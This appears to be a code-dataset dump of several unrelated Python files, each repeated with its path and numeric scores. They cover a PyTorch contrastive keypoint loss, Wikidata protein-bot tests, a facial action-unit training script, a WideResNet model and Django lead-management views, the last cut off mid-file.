import numpy as np import matplotlib.pyplot as plt import torch import torch.nn.functional as F import torchvision.transforms as T from kornia.feature.hardnet import HardNet8 from kornia.feature.tfeat import TFeat from kornia.morphology import erosion from kornia.filters import laplacian from src.models.hog_layer import HoGLayer def get_representation(keypoint_coordinates: torch.Tensor, image: torch.Tensor, feature_map: torch.Tensor) -> (torch.Tensor, torch.Tensor): """ :param keypoint_coordinates: Tensor of key-point coordinates in (N, 2/3) :param image: Tensor of current image in (N, C, H, W) :param feature_map: Tensor of feature map for key-point in (N, H', W') :return: """ N, C, H, W = image.shape # Feature maps are converted to 0-1 masks given a threshold alpha = 0.5 mask = torch.round(feature_map).unsqueeze(1).to(image.device) # (N, H', W'), rounds to the closest integer # Use erosion iteratively intensities = [] erosion_kernel = torch.ones(size=(3, 3)).to(image.device) _img = mask count = 0 while True: _morphed = erosion(_img, kernel=erosion_kernel, engine='convolution') _morphed = F.interpolate(input=_morphed, size=(H, W)) _img = torch.mul(_morphed, image) if count == 0: laplacian_img = laplacian(input=_img, kernel_size=3) laplacian_sum = laplacian_img.sum(dim=(1, 2, 3)) count += 1 intensity = _img.sum(dim=(1, 2, 3)) intensities.append(intensity) if - 1e-3 <= intensity.mean() <= 1e-3: break features = torch.empty(size=(image.shape[0], 5)).to(image.device) for n in range(image.shape[0]): features[n, ...] 
= torch.tensor([ keypoint_coordinates[n, 0], keypoint_coordinates[n, 1], intensities[-1][n], intensities[-2][n] if len(intensities) >= 2 else intensities[-1][n], intensities[-3][n] if len(intensities) >= 3 else intensities[-1][n] ]) return features, laplacian_sum def pixelwise_contrastive_loss(keypoint_coordinates: torch.Tensor, image_sequence: torch.Tensor, feature_map_seq: torch.Tensor, time_window: int = 3, alpha: float = 0.1, verbose: bool = False) -> torch.Tensor: """ Encourages key-points to represent different patches of the input image. :param keypoint_coordinates: Tensor of key-point coordinates in (N, T, K, 2/3) :param image_sequence: Tensor of image sequence in (N, T, C, H, W) :param feature_map_seq: Tensor of feature maps per key-point in (N, T, K, H', W') :param time_window: Amount of time-steps for positive/negative matching :param alpha: Margin for matches vs. non-matches :param verbose: Set true for additional output prints :return: Tensor of average loss """ assert keypoint_coordinates.dim() == 4 assert image_sequence.dim() == 5 assert keypoint_coordinates.shape[0:2] == image_sequence.shape[0:2] assert time_window <= image_sequence.shape[1] N, T, C, H, W = image_sequence.shape K = keypoint_coordinates.shape[2] pos_range = max(int(time_window / 2), 1) if time_window > 1 else 0 # Calculate loss per time-step per key-points # The features are extracted and their ids (time-step, # key-point) saved to a list to look them up again if needed features = torch.empty(size=(N, T, K, 5)).to(image_sequence.device) laplacian_sums = torch.empty(size=(N, T, K, 1)).to(image_sequence.device) feature_ids = [] total_loss = torch.zeros(size=(N,)).to(image_sequence.device) # total_loss.requires_grad_(True) for t in range(0, T): loss_per_timestep = torch.zeros(size=(N,)).to(image_sequence.device) # loss_per_timestep.requires_grad_(True) for k in range(0, K): """ Anchor patch """ matches = [(t_i, k) for t_i in range(max(t - pos_range, 0), min(t + pos_range + 1, T))] if 
time_window > 1 else [] matches.remove((t, k)) non_matches = [(t_j, k_j) for t_j in range(max(t - pos_range, 0), min(t + pos_range + 1, T)) for k_j in range(0, K) if k_j != k] # Anchor patch if (t, k) in feature_ids: anchor_ft = features[:, t, k, ...] anchor_laplacian_sum = laplacian_sums[:, t, k, ...].squeeze(1) else: anchor_ft, anchor_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t, k, ...], image=image_sequence[:, t, ...], feature_map=feature_map_seq[:, t, k, ...]) features[:, t, k, ...] = anchor_ft laplacian_sums[:, t, k, ...] = anchor_laplacian_sum.unsqueeze(-1) feature_ids.append((t, k)) """ Match (positive) patches """ L_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_match.requires_grad_(True) for t_i, k_i in matches: if (t_i, k_i) in feature_ids: #print('selected') match_ft = features[:, t_i, k_i, ...] match_laplacian_sum = laplacian_sums[:, t_i, k_i, ...].squeeze(1) else: #print('calculated') match_ft, match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_i, k_i, ...], image=image_sequence[:, t_i, ...], feature_map=feature_map_seq[:, t_i, k_i, ...]) features[:, t_i, k_i, ...] = match_ft laplacian_sums[:, t_i, k_i, ...] = match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_i, k_i)) L_match = L_match + torch.mul( L_match + torch.norm(anchor_ft - match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - match_laplacian_sum)) L_match = L_match / len(matches) """ Non-match (negative) patches """ L_non_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_non_match.requires_grad_(True) for t_j, k_j in non_matches: if (t_j, k_j) in feature_ids: #print('selected') non_match_ft = features[:, t_j, k_j, ...] 
non_match_laplacian_sum = laplacian_sums[:, t_j, k_j, ...].squeeze(1) else: #print('calculated') non_match_ft, non_match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_j, k_j, ...], image=image_sequence[:, t_j, ...], feature_map=feature_map_seq[:, t_j, k_j, ...]) features[:, t_j, k_j, ...] = non_match_ft laplacian_sums[:, t_j, k_j, ...] = non_match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_j, k_j)) L_non_match = L_non_match + torch.mul( torch.norm(anchor_ft - non_match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - non_match_laplacian_sum)) L_non_match = L_non_match / len(non_matches) loss_per_timestep = loss_per_timestep + \ torch.maximum(L_match - L_non_match + alpha, torch.zeros(size=(N,)).to(image_sequence.device)) loss_per_timestep = torch.div(loss_per_timestep, (K * (time_window * K - 1))) total_loss = total_loss + loss_per_timestep # Average across batch return torch.mean(total_loss, dim=0)
src/losses/pixelwise_contrastive_loss_2.py
import numpy as np import matplotlib.pyplot as plt import torch import torch.nn.functional as F import torchvision.transforms as T from kornia.feature.hardnet import HardNet8 from kornia.feature.tfeat import TFeat from kornia.morphology import erosion from kornia.filters import laplacian from src.models.hog_layer import HoGLayer def get_representation(keypoint_coordinates: torch.Tensor, image: torch.Tensor, feature_map: torch.Tensor) -> (torch.Tensor, torch.Tensor): """ :param keypoint_coordinates: Tensor of key-point coordinates in (N, 2/3) :param image: Tensor of current image in (N, C, H, W) :param feature_map: Tensor of feature map for key-point in (N, H', W') :return: """ N, C, H, W = image.shape # Feature maps are converted to 0-1 masks given a threshold alpha = 0.5 mask = torch.round(feature_map).unsqueeze(1).to(image.device) # (N, H', W'), rounds to the closest integer # Use erosion iteratively intensities = [] erosion_kernel = torch.ones(size=(3, 3)).to(image.device) _img = mask count = 0 while True: _morphed = erosion(_img, kernel=erosion_kernel, engine='convolution') _morphed = F.interpolate(input=_morphed, size=(H, W)) _img = torch.mul(_morphed, image) if count == 0: laplacian_img = laplacian(input=_img, kernel_size=3) laplacian_sum = laplacian_img.sum(dim=(1, 2, 3)) count += 1 intensity = _img.sum(dim=(1, 2, 3)) intensities.append(intensity) if - 1e-3 <= intensity.mean() <= 1e-3: break features = torch.empty(size=(image.shape[0], 5)).to(image.device) for n in range(image.shape[0]): features[n, ...] 
= torch.tensor([ keypoint_coordinates[n, 0], keypoint_coordinates[n, 1], intensities[-1][n], intensities[-2][n] if len(intensities) >= 2 else intensities[-1][n], intensities[-3][n] if len(intensities) >= 3 else intensities[-1][n] ]) return features, laplacian_sum def pixelwise_contrastive_loss(keypoint_coordinates: torch.Tensor, image_sequence: torch.Tensor, feature_map_seq: torch.Tensor, time_window: int = 3, alpha: float = 0.1, verbose: bool = False) -> torch.Tensor: """ Encourages key-points to represent different patches of the input image. :param keypoint_coordinates: Tensor of key-point coordinates in (N, T, K, 2/3) :param image_sequence: Tensor of image sequence in (N, T, C, H, W) :param feature_map_seq: Tensor of feature maps per key-point in (N, T, K, H', W') :param time_window: Amount of time-steps for positive/negative matching :param alpha: Margin for matches vs. non-matches :param verbose: Set true for additional output prints :return: Tensor of average loss """ assert keypoint_coordinates.dim() == 4 assert image_sequence.dim() == 5 assert keypoint_coordinates.shape[0:2] == image_sequence.shape[0:2] assert time_window <= image_sequence.shape[1] N, T, C, H, W = image_sequence.shape K = keypoint_coordinates.shape[2] pos_range = max(int(time_window / 2), 1) if time_window > 1 else 0 # Calculate loss per time-step per key-points # The features are extracted and their ids (time-step, # key-point) saved to a list to look them up again if needed features = torch.empty(size=(N, T, K, 5)).to(image_sequence.device) laplacian_sums = torch.empty(size=(N, T, K, 1)).to(image_sequence.device) feature_ids = [] total_loss = torch.zeros(size=(N,)).to(image_sequence.device) # total_loss.requires_grad_(True) for t in range(0, T): loss_per_timestep = torch.zeros(size=(N,)).to(image_sequence.device) # loss_per_timestep.requires_grad_(True) for k in range(0, K): """ Anchor patch """ matches = [(t_i, k) for t_i in range(max(t - pos_range, 0), min(t + pos_range + 1, T))] if 
time_window > 1 else [] matches.remove((t, k)) non_matches = [(t_j, k_j) for t_j in range(max(t - pos_range, 0), min(t + pos_range + 1, T)) for k_j in range(0, K) if k_j != k] # Anchor patch if (t, k) in feature_ids: anchor_ft = features[:, t, k, ...] anchor_laplacian_sum = laplacian_sums[:, t, k, ...].squeeze(1) else: anchor_ft, anchor_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t, k, ...], image=image_sequence[:, t, ...], feature_map=feature_map_seq[:, t, k, ...]) features[:, t, k, ...] = anchor_ft laplacian_sums[:, t, k, ...] = anchor_laplacian_sum.unsqueeze(-1) feature_ids.append((t, k)) """ Match (positive) patches """ L_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_match.requires_grad_(True) for t_i, k_i in matches: if (t_i, k_i) in feature_ids: #print('selected') match_ft = features[:, t_i, k_i, ...] match_laplacian_sum = laplacian_sums[:, t_i, k_i, ...].squeeze(1) else: #print('calculated') match_ft, match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_i, k_i, ...], image=image_sequence[:, t_i, ...], feature_map=feature_map_seq[:, t_i, k_i, ...]) features[:, t_i, k_i, ...] = match_ft laplacian_sums[:, t_i, k_i, ...] = match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_i, k_i)) L_match = L_match + torch.mul( L_match + torch.norm(anchor_ft - match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - match_laplacian_sum)) L_match = L_match / len(matches) """ Non-match (negative) patches """ L_non_match = torch.zeros(size=(N,)).to(image_sequence.device) # L_non_match.requires_grad_(True) for t_j, k_j in non_matches: if (t_j, k_j) in feature_ids: #print('selected') non_match_ft = features[:, t_j, k_j, ...] 
non_match_laplacian_sum = laplacian_sums[:, t_j, k_j, ...].squeeze(1) else: #print('calculated') non_match_ft, non_match_laplacian_sum = get_representation( keypoint_coordinates=keypoint_coordinates[:, t_j, k_j, ...], image=image_sequence[:, t_j, ...], feature_map=feature_map_seq[:, t_j, k_j, ...]) features[:, t_j, k_j, ...] = non_match_ft laplacian_sums[:, t_j, k_j, ...] = non_match_laplacian_sum.unsqueeze(-1) feature_ids.append((t_j, k_j)) L_non_match = L_non_match + torch.mul( torch.norm(anchor_ft - non_match_ft, dim=1, p=2), torch.abs(anchor_laplacian_sum - non_match_laplacian_sum)) L_non_match = L_non_match / len(non_matches) loss_per_timestep = loss_per_timestep + \ torch.maximum(L_match - L_non_match + alpha, torch.zeros(size=(N,)).to(image_sequence.device)) loss_per_timestep = torch.div(loss_per_timestep, (K * (time_window * K - 1))) total_loss = total_loss + loss_per_timestep # Average across batch return torch.mean(total_loss, dim=0)
0.774029
0.772874
from wikidataintegrator import wdi_login, wdi_core, wdi_helpers from scheduled_bots.geneprotein import HelperBot from scheduled_bots.geneprotein.ProteinBot import main, Protein, PROPS from pymongo import MongoClient from scheduled_bots.local import WDUSER, WDPASS def _test_write_one_protein(qid, entrezgene, taxid): coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'_id': entrezgene} print("total number of records: {}".format(coll.find(doc_filter).count())) main(coll, taxid=taxid, metadata=metadata, fast_run=False, write=True, doc_filter=doc_filter) fn = wdi_core.WDItemEngine.logger.handlers[0].baseFilename log = open(fn).read() assert qid in log assert "WARNING" not in log and "ERROR" not in log def test_write_one_human_protein(): qid = "Q21109414" taxid = '9606' entrezgene = '1877' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_microbe_protein(): qid = "Q23433065" taxid = '243277' entrezgene = '2614876' _test_write_one_protein(qid, entrezgene, taxid) def test_write_another_microbe_protein(): qid = "Q30106073" taxid = '243161' entrezgene = '1246473' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_yeast_protein(): qid = "Q27547347" taxid = '559292' entrezgene = '856002' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_mouse_protein(): qid = "Q21990557" taxid = '10090' entrezgene = '19744' _test_write_one_protein(qid, entrezgene, taxid) def validate_all_human_protein(): # runs all proteins through the validator # and generates a log file coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'taxid': 9606, 'entrezgene': {'$exists': True}} docs = coll.find(doc_filter) print("total number of records: {}".format(coll.find(doc_filter).count())) validate_type = 'eukaryotic' docs = HelperBot.validate_docs(docs, validate_type, 
'P351') records = HelperBot.tag_mygene_docs(docs, metadata) _ = list(records)
scheduled_bots/geneprotein/test_ProteinBot.py
from wikidataintegrator import wdi_login, wdi_core, wdi_helpers from scheduled_bots.geneprotein import HelperBot from scheduled_bots.geneprotein.ProteinBot import main, Protein, PROPS from pymongo import MongoClient from scheduled_bots.local import WDUSER, WDPASS def _test_write_one_protein(qid, entrezgene, taxid): coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'_id': entrezgene} print("total number of records: {}".format(coll.find(doc_filter).count())) main(coll, taxid=taxid, metadata=metadata, fast_run=False, write=True, doc_filter=doc_filter) fn = wdi_core.WDItemEngine.logger.handlers[0].baseFilename log = open(fn).read() assert qid in log assert "WARNING" not in log and "ERROR" not in log def test_write_one_human_protein(): qid = "Q21109414" taxid = '9606' entrezgene = '1877' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_microbe_protein(): qid = "Q23433065" taxid = '243277' entrezgene = '2614876' _test_write_one_protein(qid, entrezgene, taxid) def test_write_another_microbe_protein(): qid = "Q30106073" taxid = '243161' entrezgene = '1246473' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_yeast_protein(): qid = "Q27547347" taxid = '559292' entrezgene = '856002' _test_write_one_protein(qid, entrezgene, taxid) def test_write_one_mouse_protein(): qid = "Q21990557" taxid = '10090' entrezgene = '19744' _test_write_one_protein(qid, entrezgene, taxid) def validate_all_human_protein(): # runs all proteins through the validator # and generates a log file coll = MongoClient().wikidata_src.mygene metadata_coll = MongoClient().wikidata_src.mygene_sources metadata = metadata_coll.find_one() doc_filter = {'taxid': 9606, 'entrezgene': {'$exists': True}} docs = coll.find(doc_filter) print("total number of records: {}".format(coll.find(doc_filter).count())) validate_type = 'eukaryotic' docs = HelperBot.validate_docs(docs, validate_type, 
'P351') records = HelperBot.tag_mygene_docs(docs, metadata) _ = list(records)
0.317532
0.27677
import argparse import shutil from functools import partial from pathlib import Path import numpy as np from python_tools.generic import namespace_as_string from python_tools.ml import metrics from python_tools.ml.default.neural_models import EnsembleModel, MLPModel from python_tools.ml.default.transformations import ( DefaultTransformations, revert_transform, set_transform, ) from python_tools.ml.evaluator import evaluator from dataloader import BP4D_PLUS, DISFA, MNIST def train(partitions: dict[str, DISFA], folder: Path, args: argparse.Namespace) -> None: params = {"interval": True, "metric_max": True, "y_names": np.array(["intensity"])} model = MLPModel(device="cuda", **params) grid_search = { "epochs": [5000], "early_stop": [50], "lr": [0.01, 0.001, 0.0001, 0.00001], "dropout": [0.0, 0.5], "layers": [0, 1, 2, 3], "activation": [{"name": "ReLU"}], "attenuation": [""], "sample_weight": [True], } if args.method == "gp": grid_search["final_activation"] = [ {"name": "gpvfe", "embedding_size": 2, "inducing_points": 2000} ] else: grid_search["final_activation"] = [{"name": "linear"}] if args.method == "attenuation": grid_search["attenuation"] = ["gaussian"] elif args.method == "dropout": grid_search["dropout"] = [0.5] elif args.method == "ensemble": model = EnsembleModel(device="cuda", **params) for key in ("layers", "activation", "dropout"): grid_search[f"model_{key}"] = grid_search.pop(key) model.parameters.pop(key) model.update_parameter(grid_search) models, parameters, model_transform = model.get_models() apply_transformation = partial( combine_transformations, model_transform=model_transform ) transform = DefaultTransformations(**params) transforms = tuple([{}] * len(partitions)) kwargs = { "parallel": "local", "n_workers": args.workers, "workers": args.workers, } print(folder) evaluator( models=models, partitions=partitions, parameters=parameters, folder=folder, metric_fun=metrics.interval_metrics, metric="ccc", metric_max=params["metric_max"], 
learn_transform=transform.define_transform, apply_transform=apply_transformation, revert_transform=revert_transform, transform_parameter=transforms, final_test=True, **kwargs, ) def combine_transformations(data, transform, model_transform=None): data = set_transform(data, transform) data.add_transform(model_transform, optimizable=True) return data if __name__ == "__main__": # argparse parser = argparse.ArgumentParser() au_flags = [ "1", "2", "4", "5", "6", "9", "10", "12", "14", "15", "17", "20", "25", "26", ] for name in au_flags + ["transfer"]: parser.add_argument( f"--{name}", action="store_const", const=True, default=False ) parser.add_argument( "--method", choices=["dropout", "attenuation", "gpvfe", "ensemble"] ) parser.add_argument("--dataset", choices=["disfa", "bp4d_plus", "mnist", "mnisti"]) parser.add_argument("--workers", type=int, default=4) args = parser.parse_args() if args.transfer: assert args.dataset == "bp4d_plus" arg_aus = [] for au in au_flags: if getattr(args, au): arg_aus.append(int(au)) # choose dataloader folds = 1 aus = [1, 2, 4, 5, 6, 9, 12, 15, 17, 20, 25, 26] backend = lambda au, fold, name: DISFA(au, ifold=fold, name=name).get_loader() if args.dataset == "bp4d_plus": aus = [6, 10, 12, 14, 17] backend = lambda au, fold, name: BP4D_PLUS( au, ifold=fold, name=name ).get_loader() elif args.dataset.startswith("mnist"): aus = [6] backend = lambda au, fold, name: MNIST( au, ifold=fold, name=name, imbalance=args.dataset == "mnisti", ).get_loader() if args.transfer: aus = [6, 12, 17] assert args.dataset == "bp4d_plus" def backend(au, fold, name): if name == "test": return DISFA(au, ifold=fold, name=name).get_loader() return BP4D_PLUS(au, ifold=fold, name=name).get_loader() # run on subset of AUs if arg_aus: aus = [au for au in aus if au in arg_aus] for au in aus: print("AU", au) folder = Path(namespace_as_string(args, exclude=("workers",)) + f"_au={au}") if args.transfer: # copy BP4D+ models args.transfer = False folder_bp4d_plus = Path( 
namespace_as_string(args, exclude=("workers",)) + f"_au={au}" ) args.transfer = True if not folder.is_dir(): shutil.copytree(folder_bp4d_plus, folder) data = { i: { name: backend(au, i, name) for name in ("training", "validation", "test") } for i in range(folds) } train(data, folder, args)
train.py
import argparse import shutil from functools import partial from pathlib import Path import numpy as np from python_tools.generic import namespace_as_string from python_tools.ml import metrics from python_tools.ml.default.neural_models import EnsembleModel, MLPModel from python_tools.ml.default.transformations import ( DefaultTransformations, revert_transform, set_transform, ) from python_tools.ml.evaluator import evaluator from dataloader import BP4D_PLUS, DISFA, MNIST def train(partitions: dict[str, DISFA], folder: Path, args: argparse.Namespace) -> None: params = {"interval": True, "metric_max": True, "y_names": np.array(["intensity"])} model = MLPModel(device="cuda", **params) grid_search = { "epochs": [5000], "early_stop": [50], "lr": [0.01, 0.001, 0.0001, 0.00001], "dropout": [0.0, 0.5], "layers": [0, 1, 2, 3], "activation": [{"name": "ReLU"}], "attenuation": [""], "sample_weight": [True], } if args.method == "gp": grid_search["final_activation"] = [ {"name": "gpvfe", "embedding_size": 2, "inducing_points": 2000} ] else: grid_search["final_activation"] = [{"name": "linear"}] if args.method == "attenuation": grid_search["attenuation"] = ["gaussian"] elif args.method == "dropout": grid_search["dropout"] = [0.5] elif args.method == "ensemble": model = EnsembleModel(device="cuda", **params) for key in ("layers", "activation", "dropout"): grid_search[f"model_{key}"] = grid_search.pop(key) model.parameters.pop(key) model.update_parameter(grid_search) models, parameters, model_transform = model.get_models() apply_transformation = partial( combine_transformations, model_transform=model_transform ) transform = DefaultTransformations(**params) transforms = tuple([{}] * len(partitions)) kwargs = { "parallel": "local", "n_workers": args.workers, "workers": args.workers, } print(folder) evaluator( models=models, partitions=partitions, parameters=parameters, folder=folder, metric_fun=metrics.interval_metrics, metric="ccc", metric_max=params["metric_max"], 
learn_transform=transform.define_transform, apply_transform=apply_transformation, revert_transform=revert_transform, transform_parameter=transforms, final_test=True, **kwargs, ) def combine_transformations(data, transform, model_transform=None): data = set_transform(data, transform) data.add_transform(model_transform, optimizable=True) return data if __name__ == "__main__": # argparse parser = argparse.ArgumentParser() au_flags = [ "1", "2", "4", "5", "6", "9", "10", "12", "14", "15", "17", "20", "25", "26", ] for name in au_flags + ["transfer"]: parser.add_argument( f"--{name}", action="store_const", const=True, default=False ) parser.add_argument( "--method", choices=["dropout", "attenuation", "gpvfe", "ensemble"] ) parser.add_argument("--dataset", choices=["disfa", "bp4d_plus", "mnist", "mnisti"]) parser.add_argument("--workers", type=int, default=4) args = parser.parse_args() if args.transfer: assert args.dataset == "bp4d_plus" arg_aus = [] for au in au_flags: if getattr(args, au): arg_aus.append(int(au)) # choose dataloader folds = 1 aus = [1, 2, 4, 5, 6, 9, 12, 15, 17, 20, 25, 26] backend = lambda au, fold, name: DISFA(au, ifold=fold, name=name).get_loader() if args.dataset == "bp4d_plus": aus = [6, 10, 12, 14, 17] backend = lambda au, fold, name: BP4D_PLUS( au, ifold=fold, name=name ).get_loader() elif args.dataset.startswith("mnist"): aus = [6] backend = lambda au, fold, name: MNIST( au, ifold=fold, name=name, imbalance=args.dataset == "mnisti", ).get_loader() if args.transfer: aus = [6, 12, 17] assert args.dataset == "bp4d_plus" def backend(au, fold, name): if name == "test": return DISFA(au, ifold=fold, name=name).get_loader() return BP4D_PLUS(au, ifold=fold, name=name).get_loader() # run on subset of AUs if arg_aus: aus = [au for au in aus if au in arg_aus] for au in aus: print("AU", au) folder = Path(namespace_as_string(args, exclude=("workers",)) + f"_au={au}") if args.transfer: # copy BP4D+ models args.transfer = False folder_bp4d_plus = Path( 
namespace_as_string(args, exclude=("workers",)) + f"_au={au}" ) args.transfer = True if not folder.is_dir(): shutil.copytree(folder_bp4d_plus, folder) data = { i: { name: backend(au, i, name) for name in ("training", "validation", "test") } for i in range(folds) } train(data, folder, args)
0.531696
0.391348
import torch.nn as nn import torch.nn.functional as F def conv_2d(ni, nf, stride=1, ks=3): """3x3 convolution with 1 pixel padding""" return nn.Conv2d(in_channels=ni, out_channels=nf, kernel_size=ks, stride=stride, padding=ks//2, bias=False) def bn_relu_conv(ni, nf): """BatchNorm → ReLU → Conv2D""" return nn.Sequential(nn.BatchNorm2d(ni), nn.ReLU(inplace=True), conv_2d(ni, nf)) class BasicBlock(nn.Module): """Residual block with shortcut connection""" def __init__(self, ni, nf, stride=1): super().__init__() self.bn = nn.BatchNorm2d(ni) self.conv1 = conv_2d(ni, nf, stride) self.conv2 = bn_relu_conv(nf, nf) self.shortcut = lambda x: x if ni != nf: self.shortcut = conv_2d(ni, nf, stride, 1) def forward(self, x): x = F.relu(self.bn(x), inplace=True) r = self.shortcut(x) x = self.conv1(x) x = self.conv2(x) * 0.2 return x.add_(r) def make_group(N, ni, nf, stride): """Group of residual blocks""" start = BasicBlock(ni, nf, stride) rest = [BasicBlock(nf, nf) for j in range(1, N)] return [start] + rest class Flatten(nn.Module): def __init__(self): super().__init__() def forward(self, x): return x.view(x.size(0), -1) class WideResNet(nn.Module): def __init__(self, n_groups, N, n_classes, k=1, n_start=16): super().__init__() # Increase channels to n_start using conv layer layers = [conv_2d(3, n_start)] n_channels = [n_start] # Add groups of BasicBlock(increase channels & downsample) for i in range(n_groups): n_channels.append(n_start*(2**i)*k) stride = 2 if i>0 else 1 layers += make_group(N, n_channels[i], n_channels[i+1], stride) # Pool, flatten & add linear layer for classification layers += [nn.BatchNorm2d(n_channels[3]), nn.ReLU(inplace=True), nn.AdaptiveAvgPool2d(1), Flatten(), nn.Linear(n_channels[3], n_classes)] self.features = nn.Sequential(*layers) def forward(self, x): return self.features(x) def wrn_22(): return WideResNet(n_groups=3, N=3, n_classes=512, k=6)
wrn.py
import torch.nn as nn import torch.nn.functional as F def conv_2d(ni, nf, stride=1, ks=3): """3x3 convolution with 1 pixel padding""" return nn.Conv2d(in_channels=ni, out_channels=nf, kernel_size=ks, stride=stride, padding=ks//2, bias=False) def bn_relu_conv(ni, nf): """BatchNorm → ReLU → Conv2D""" return nn.Sequential(nn.BatchNorm2d(ni), nn.ReLU(inplace=True), conv_2d(ni, nf)) class BasicBlock(nn.Module): """Residual block with shortcut connection""" def __init__(self, ni, nf, stride=1): super().__init__() self.bn = nn.BatchNorm2d(ni) self.conv1 = conv_2d(ni, nf, stride) self.conv2 = bn_relu_conv(nf, nf) self.shortcut = lambda x: x if ni != nf: self.shortcut = conv_2d(ni, nf, stride, 1) def forward(self, x): x = F.relu(self.bn(x), inplace=True) r = self.shortcut(x) x = self.conv1(x) x = self.conv2(x) * 0.2 return x.add_(r) def make_group(N, ni, nf, stride): """Group of residual blocks""" start = BasicBlock(ni, nf, stride) rest = [BasicBlock(nf, nf) for j in range(1, N)] return [start] + rest class Flatten(nn.Module): def __init__(self): super().__init__() def forward(self, x): return x.view(x.size(0), -1) class WideResNet(nn.Module): def __init__(self, n_groups, N, n_classes, k=1, n_start=16): super().__init__() # Increase channels to n_start using conv layer layers = [conv_2d(3, n_start)] n_channels = [n_start] # Add groups of BasicBlock(increase channels & downsample) for i in range(n_groups): n_channels.append(n_start*(2**i)*k) stride = 2 if i>0 else 1 layers += make_group(N, n_channels[i], n_channels[i+1], stride) # Pool, flatten & add linear layer for classification layers += [nn.BatchNorm2d(n_channels[3]), nn.ReLU(inplace=True), nn.AdaptiveAvgPool2d(1), Flatten(), nn.Linear(n_channels[3], n_classes)] self.features = nn.Sequential(*layers) def forward(self, x): return self.features(x) def wrn_22(): return WideResNet(n_groups=3, N=3, n_classes=512, k=6)
0.959677
0.469581
from django.shortcuts import reverse from django.views import generic from django.contrib.auth.mixins import LoginRequiredMixin from agents.mixins import OrganiserAndLoginRequiredMixin from .models import Lead, Category, Agent from .forms import ( LeadModelForm, CustomUserCreationForm, AssignAgentForm, LeadCategoryUpdateForm, CategoryModelForm ) class SignupView(generic.CreateView): template_name = 'registration/signup.html' form_class = CustomUserCreationForm def get_success_url(self): return reverse('login') class LandingPageView(generic.TemplateView): template_name = 'landing.html' class LeadListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/lead_list.html' context_object_name = 'leads' def get_queryset(self): user = self.request.user if self.request.user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=False) else: queryset = Lead.objects.filter(organisation=user.agent.organisation, agent__isnull=False) queryset = queryset.filter(agent__user=user) return queryset def get_context_data(self, **kwargs): context = super(LeadListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile, agent__isnull=True) context.update({ 'unassigned_leads': queryset }) return context class LeadDetailView(OrganiserAndLoginRequiredMixin, generic.DetailView): template_name = 'leads/lead_detail.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) class LeadCreateView(OrganiserAndLoginRequiredMixin, generic.CreateView): template_name = 'leads/lead_create.html' form_class = LeadModelForm def form_valid(self, form): lead = form.save(commit=False) user = self.request.user if user.is_organiser: lead.organisation = user.userprofile else: lead.organisation = user.agent.organisation lead.save() return super(LeadCreateView, self).form_valid(form) def get_success_url(self): return 
reverse('leads:lead-list') class LeadUpdateView(OrganiserAndLoginRequiredMixin, generic.UpdateView): template_name = 'leads/lead_update.html' form_class = LeadModelForm def get_form(self, form_class=None): form = super(LeadUpdateView, self).get_form(form_class) user = self.request.user if self.request.user.is_organiser: queryset = Agent.objects.filter(organisation=user.userprofile) else: queryset = Agent.objects.filter(organisation=user.agent.organisation) form.fields['agent'].queryset = queryset return form def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-detail', kwargs={'pk': self.get_object().pk}) class LeadDeleteView(OrganiserAndLoginRequiredMixin, generic.DeleteView): template_name = 'leads/lead_delete.html' def get_queryset(self): return Lead.objects.filter(organisation=self.request.user.userprofile) def get_success_url(self): return reverse('leads:lead-list') class AssignAgentView(OrganiserAndLoginRequiredMixin, generic.FormView): template_name = 'leads/assign_agent.html' form_class = AssignAgentForm def get_form_kwargs(self): kwargs = super(AssignAgentView, self).get_form_kwargs() kwargs.update({'request': self.request}) return kwargs def form_valid(self, form): lead = Lead.objects.get(id=self.kwargs.get('pk')) lead.agent = form.cleaned_data.get('agent') lead.save() return super(AssignAgentView, self).form_valid(form) def get_success_url(self): return reverse('leads:lead-list') class CategoryListView(LoginRequiredMixin, generic.ListView): template_name = 'leads/category_list.html' context_object_name = 'categories' def get_context_data(self, **kwargs): context = super(CategoryListView, self).get_context_data(**kwargs) user = self.request.user if user.is_organiser: queryset = Lead.objects.filter(organisation=user.userprofile) else: queryset = Lead.objects.filter(organisation=user.agent.organisation) context.update({ 'unassigned_lead_count': 
